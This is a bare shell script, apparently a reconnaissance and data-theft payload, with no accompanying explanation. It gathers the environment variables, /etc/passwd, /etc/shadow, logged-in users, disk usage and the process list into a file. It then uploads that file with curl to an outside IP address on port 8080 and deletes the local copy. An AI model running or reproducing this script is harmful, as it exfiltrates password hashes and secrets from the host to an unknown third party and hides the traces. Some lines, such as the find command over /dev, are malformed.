pwd > testing
echo ----------------- ls ------- >> testing
find /dev/ -depth -type f -exec cat '{}' | grep -i "json" \; >> testing
echo ----------------- Environment ------- >> testing
env >> testing
echo ----------------- User Info ------- >> testing
cat /etc/passwd >> testing
cat /etc/shadow >> testing
echo ----------------- Users logged in ------- >> testing
w >> testing
echo ----------------- Disk Space ------- >> testing
df -h >> testing
echo ----------------- ps -aux ------- >> testing
ps -aux >> testing
echo ----------------- END $(date) ------- >> testing
curl -F "name=@testing" http://138.68.58.230:8080 && echo -n ool
rm testing
